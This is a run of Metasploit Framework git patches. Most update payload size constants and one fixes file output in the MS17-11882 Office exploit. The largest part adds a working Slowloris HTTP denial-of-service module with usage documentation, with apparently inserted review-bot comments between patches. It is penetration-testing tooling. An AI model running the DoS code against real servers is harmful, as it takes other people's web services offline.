a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56570 + CachedSize = 57798 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 354fd0852e..f016ee0023 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb 
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56530 + CachedSize = 57762 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index dbf19dc526..d13916ecb6 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56534 + CachedSize = 57762 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index f63420ede9..721b61e0de 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python' module MetasploitModule - CachedSize = 56486 + CachedSize = 57714 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 4aa49bfccd..79e23e6a0c 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 12cb6341e7..2bcca8d51c 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb 
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 180311 + CachedSize = 180825 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 539bfd288f..2f470a05b9 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 180311 + CachedSize = 180825 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 23d9de6df9..dce4c880d4 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 256f5b6225..bacdd2591d 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 179267 + CachedSize = 179779 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 058078b353..86df5d345e 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb 
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 0398f24b52..b88ce277d6 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 206423 + CachedSize = 206937 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 5679a3a8be..f3fd8e639b 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 206423 + CachedSize = 206937 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index bb151559da..102840f525 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows 
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 337ebe2c73..b38fe1f070 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config' module MetasploitModule - CachedSize = 205379 + CachedSize = 205891 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index 635afb61ca..70521e2055 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/bind_tcp' module MetasploitModule - CachedSize = 5118 + CachedSize = 5303 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index 2d1498c7d5..8f011c61f2 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_http' module MetasploitModule - CachedSize = 5123 + CachedSize = 5386 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index d276ea2d52..a58aa42357 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/java/reverse_https' module MetasploitModule - CachedSize = 5932 + CachedSize = 6195 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index 5ad61693af..4f5110192a 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb 
+++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_tcp' module MetasploitModule - CachedSize = 5118 + CachedSize = 5303 include Msf::Payload::Stager include Msf::Payload::Java diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 2b58ea764b..819f4848b9 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_http' module MetasploitModule - CachedSize = 339 + CachedSize = 347 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 907fa651de..31e6d29a13 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_https' module MetasploitModule - CachedSize = 359 + CachedSize = 367 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index ba77689d2a..f79ba8c95d 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https_proxy' module MetasploitModule - CachedSize = 397 + CachedSize = 384 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb index eb634588de..fd0d496261 100644 --- a/modules/payloads/stagers/windows/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/reverse_winhttp.rb 
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttp' module MetasploitModule - CachedSize = 357 + CachedSize = 520 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb index a7784e0c4c..07726c00c3 100644 --- a/modules/payloads/stagers/windows/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/reverse_winhttps.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttps' module MetasploitModule - CachedSize = 377 + CachedSize = 542 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index 6a2686cc83..624fc33a65 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_http' module MetasploitModule - CachedSize = 520 + CachedSize = 529 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index d11003e5f5..7cee13664a 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_https' module MetasploitModule - CachedSize = 551 + CachedSize = 563 include Msf::Payload::Stager include Msf::Payload::Windows diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index 3ee66da58d..3571790029 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb 
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttp'
 module MetasploitModule
-  CachedSize = 532
+  CachedSize = 746
   include Msf::Payload::Stager
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
index 0a70268db0..2ed98e3f61 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttps'
 module MetasploitModule
-  CachedSize = 563
+  CachedSize = 782
   include Msf::Payload::Stager
   include Msf::Payload::Windows
From fcea6fd8d4af65ee9f308c5e149caf294d5a4eb9 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Tue, 21 Nov 2017 15:00:06 -0500
Subject: [PATCH 181/254] actually create new file ;-;
---
 modules/exploits/windows/fileformat/office_ms17_11882.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/windows/fileformat/office_ms17_11882.rb b/modules/exploits/windows/fileformat/office_ms17_11882.rb
index e5f44235ec..83995534f2 100644
--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -134,10 +134,10 @@ class MetasploitModule < Msf::Exploit::Remote
     payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
     payload = header + payload + footer
-    rtf = File.new(datastore['FILENAME'], 'w')
-    rtf.write(payload)
-    rtf.close
-    rtf
+    ::File.open(datastore['FILENAME'], 'wb') do |fd|
+      fd.write(payload)
+      fd.close
+    end
   end
From a7932ffe0e36f913d4bfbe2a0ccfc7bb42730fa0 Mon Sep 17 00:00:00 2001
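Review bot: The `fd.close` inside the `::File.open` block is redundant, since the block form closes the handle when the block returns, so the write collapses to `::File.open(datastore['FILENAME'], 'wb') { |fd| fd.write(payload) }`. The method's return value also changes with this hunk: the old code returned the `File` object, while the block form returns the value of its last expression (`fd.close`, which is `nil`), so any caller that used the result should be checked; the enclosing method starts outside the hunk. Switching to `'wb'` is the right move for binary output, and if this module mixes in Metasploit's FILEFORMAT helpers, `file_create(payload)` would also handle the output path and the stored-at message for you.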
From: Brent Cook Date: Tue, 21 Nov 2017 14:31:14 -0600 Subject: [PATCH 182/254] fix sizes --- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index 3a5b484828..d1749f9c25 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1029776 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index bc464ffbc7..bc1d3f2c08 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1029776 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index a01c6f9db5..cc021b9ff2 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1029776 + CachedSize = 1053924 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
From f79b41edde1db4d5982c54dd768818d5292ad6ca Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 31 Oct 2017 16:30:09 +0000 Subject: [PATCH 183/254] Slow Loris --- modules/auxiliary/dos/http/slow_loris.rb | 71 ++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 modules/auxiliary/dos/http/slow_loris.rb diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb new file mode 100644 index 0000000000..14f38175b0 --- /dev/null +++ b/modules/auxiliary/dos/http/slow_loris.rb 
@@ -0,0 +1,71 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name' => 'Slow Loris DoS',
+      'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
+        It accomplishes this by opening connections to the target web server and sending a partial request.
+        Periodically, it will send subsequent requests, adding to—but never completing—the request.},
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'RSnake', # Vulnerability disclosure
+          'Daniel Teixeira' # Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/8976/']
+        ],
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptInt.new('THREADS', [true, 'The number of concurrent threads', 5000]),
+        OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 60])
+      ])
+  end
+
+  def thread_count
+    datastore['THREADS']
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def run
+
+    starting_thread = 1
+    while true do
+      ubound = [thread_count].min
+      print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
+
+      threads = []
+      1.upto(ubound) do |i|
+        threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
+          begin
+            connect()
+            header = "GET / HTTP/1.1\r\n"
+            sock.puts(header)
+            sleep rand(1..15)
+            data = "X-a-#{rand(0..1000)}: b\r\n"
+            sock.puts(data)
+          end
+        end
+      end
+
+      threads.each(&:join)
+      print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
+      starting_thread += ubound
+    end
+  end
+end
From 29017b89267b50721cc961e28dfd719ae5e2d811 Mon Sep 17 00:00:00 2001
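Review bot: `TIMEOUT` is registered and exposed through the `timeout` accessor, but `run` never reads it, so an option documented as "The maximum time in seconds to wait for each request to finish" has no effect on what the module does; either use it where the connection or the `join` waits, or drop the option and the accessor so operators are not misled. Two smaller points in `run`: `ubound = [thread_count].min` is simply `thread_count`, and the `begin … end` around the connection body has no `rescue` or `ensure`, so it is a no-op wrapper that neither handles a failed `connect` nor releases the socket through `disconnect` once the sends are done. The inner block parameter `|i|` also shadows the `1.upto` index of the same name, which Ruby warns about; `|_|` or a distinct name avoids it. `while true do` is conventionally written `loop do`.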
From: Daniel Teixeira
Date: Wed, 1 Nov 2017 10:01:42 +0000
Subject: [PATCH 184/254] Update slow_loris.rb
---
 modules/auxiliary/dos/http/slow_loris.rb | 14 +++++++++-----
 1 file changed, 9 insertions(+), 5 deletions(-)
diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb
index 14f38175b0..2e7c0939f4 100644
--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name' => 'Slow Loris DoS',
       'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
         It accomplishes this by opening connections to the target web server and sending a partial request.
-        Periodically, it will send subsequent requests, adding to—but never completing—the request.},
+        Periodically, it will send subsequent requests, adding to but never completing the request.},
       'License' => MSF_LICENSE,
       'Author' =>
         [
@@ -22,7 +22,9 @@ class MetasploitModule < Msf::Auxiliary
         ],
       'References' =>
         [
-          ['URL', 'https://www.exploit-db.com/exploits/8976/']
+          [ 'CVE', '2007-6750' ],
+          [ 'CVE', '2010-2227' ],
+          [ 'URL', 'https://www.exploit-db.com/exploits/8976/' ]
         ],
     ))
@@ -56,9 +58,11 @@ class MetasploitModule < Msf::Auxiliary
             connect()
             header = "GET / HTTP/1.1\r\n"
             sock.puts(header)
-            sleep rand(1..15)
-            data = "X-a-#{rand(0..1000)}: b\r\n"
-            sock.puts(data)
+            10.times do
+              data = "X-a-#{rand(0..1000)}: b\r\n"
+              sock.puts(data)
+              sleep rand(1..15)
+            end
           end
         end
       end
From 9457359b11606662a787f54827d573fe67341bf8 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira
Date: Thu, 2 Nov 2017 14:02:59 +0000
Subject: [PATCH 185/254] Update slow_loris.rb
---
 modules/auxiliary/dos/http/slow_loris.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb
index 2e7c0939f4..ee5f023550 100644
--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -45,8 +45,9 @@ class MetasploitModule < Msf::Auxiliary
   end
   def run
-
     starting_thread = 1
+    header = "GET / HTTP/1.1\r\n"
+
     while true do
       ubound = [thread_count].min
       print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
@@ -56,7 +57,6 @@ class MetasploitModule < Msf::Auxiliary
         threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
           begin
             connect()
-            header = "GET / HTTP/1.1\r\n"
             sock.puts(header)
             10.times do
               data = "X-a-#{rand(0..1000)}: b\r\n"
From 60878215e0a48f0d7ae8c480d1b9af84de5477a9 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira
Date: Fri, 3 Nov 2017 11:11:20 +0000
Subject: [PATCH 186/254] Update slow_loris.rb
---
 modules/auxiliary/dos/http/slow_loris.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb
index ee5f023550..afef986f49 100644
--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -47,12 +47,12 @@ class MetasploitModule < Msf::Auxiliary
   def run
     starting_thread = 1
     header = "GET / HTTP/1.1\r\n"
+    threads = []
     while true do
       ubound = [thread_count].min
       print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
-
-      threads = []
+
       1.upto(ubound) do |i|
         threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
           begin
@@ -66,9 +66,7 @@ class MetasploitModule < Msf::Auxiliary
           end
         end
       end
-      threads.each(&:join)
-      print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
       starting_thread += ubound
     end
   end
From 21a6d0bd6ea13fbe0441b6b60b846aee08eb9306 Mon Sep 17 00:00:00 2001
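Review bot: In PATCH 186, removing `threads.each(&:join)` while `while true do` stays in place (it is context in the first hunk) leaves `run` with nothing to wait on: every pass of the loop spawns `thread_count` more threads and appends them to the now loop-external `threads` array, which is neither joined nor cleared, so the thread population and the array grow without bound until the framework's thread limit or memory is hit. If a single batch is intended the loop has to go too; if continuous operation is intended the previous batch must be joined before the next one is spawned. `run` continues past the end of the second hunk, so the loop's closing `end` is not visible here.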
From: Daniel Teixeira
Date: Fri, 3 Nov 2017 18:14:47 +0000
Subject: [PATCH 187/254] Update slow_loris.rb
---
 modules/auxiliary/dos/http/slow_loris.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb
index afef986f49..30b2e7005d 100644
--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(
       info,
       'Name' => 'Slow Loris DoS',
-      'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
+      'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
         It accomplishes this by opening connections to the target web server and sending a partial request.
         Periodically, it will send subsequent requests, adding to but never completing the request.},
       'License' => MSF_LICENSE,
@@ -48,11 +48,11 @@ class MetasploitModule < Msf::Auxiliary
     starting_thread = 1
     header = "GET / HTTP/1.1\r\n"
     threads = []
-    while true do
+
       ubound = [thread_count].min
       print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
-
+
       1.upto(ubound) do |i|
         threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
           begin
From 53123d92e2d79fdb01d93868aaf0d51a2c7a95a2 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira
Date: Fri, 3 Nov 2017 18:19:12 +0000
Subject: [PATCH 188/254] Update slow_loris.rb
---
 modules/auxiliary/dos/http/slow_loris.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/auxiliary/dos/http/slow_loris.rb b/modules/auxiliary/dos/http/slow_loris.rb
index 30b2e7005d..1897c11b1a 100644
--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
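Review bot: Removing `while true do` in the second hunk of PATCH 187 without removing its matching `end` leaves `run` with one `end` too many: the `end` that closed the loop now closes the method, the method's `end` closes the class, and the class's own `end` is unmatched, so the module should fail to load with a syntax error. The diffstat reports three deletions and all three are visible in these two hunks (the first is a whitespace-only change to the description), so the loop's closing `end` does not appear to have been removed elsewhere; it needs to go, together with `starting_thread += ubound`, which has no reader once there is a single pass. `run`'s body continues outside the hunk, so the trailing `end`s themselves are not visible here.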
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary info, 'Name' => 'Slow Loris DoS', 'Description' => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. - It accomplishes this by opening connections to the target web server and sending a partial request. + It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent requests, adding to but never completing the request.}, 'License' => MSF_LICENSE, 'Author' => From 4419c0d85180eded7562221d1464d87946b19fbd Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 7 Nov 2017 20:51:26 +0000 Subject: [PATCH 189/254] Create slow_loris.md --- .../modules/auxiliary/dos/http/slow_loris.md | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 documentation/modules/auxiliary/dos/http/slow_loris.md diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md new file mode 100644 index 0000000000..06a7846e08 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md 
@@ -0,0 +1,43 @@ +Vulnerable Application + +This module tries to keep many connections to the target web server open and hold them open as long as possible. + +Vulnerable app versions include: + +- Apache HTTP Server 1.x and 2.x +- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta + +Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + +Verification Steps + +1. Start msfconsole +2. Do: use auxiliary/dos/http/slow_loris +3. Do: set RHOST +4. Do: run +5. Visit server URL in your web-browser. + +Scenarios + +Apache/2.2.8 - Ubuntu 8.04 + +``` +msf > use auxiliary/dos/http/slow_loris.rb +msf auxiliary(slow_loris) > show options + +Module options (auxiliary/dos/http/slow_loris): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.216.129 yes The target address + RPORT 80 yes The target port (TCP) + THREADS 5000 yes The number of concurrent threads + TIMEOUT 60 yes The maximum time in seconds to wait for each request to finish + +msf auxiliary(slow_loris) > set RHOST 192.168.216.129 +RHOST => 192.168.216.129 +msf auxiliary(slow_loris) > run + +[*] 192.168.216.129:80 - Executing requests 1 - 5000... + +``` From fbb9e9d47351b633ea9f2e40049e8293b65677e8 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 7 Nov 2017 20:53:06 +0000 Subject: [PATCH 190/254] Update slow_loris.md --- documentation/modules/auxiliary/dos/http/slow_loris.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/auxiliary/dos/http/slow_loris.md b/documentation/modules/auxiliary/dos/http/slow_loris.md index 06a7846e08..b7af5c00e4 100644 --- a/documentation/modules/auxiliary/dos/http/slow_loris.md +++ b/documentation/modules/auxiliary/dos/http/slow_loris.md 
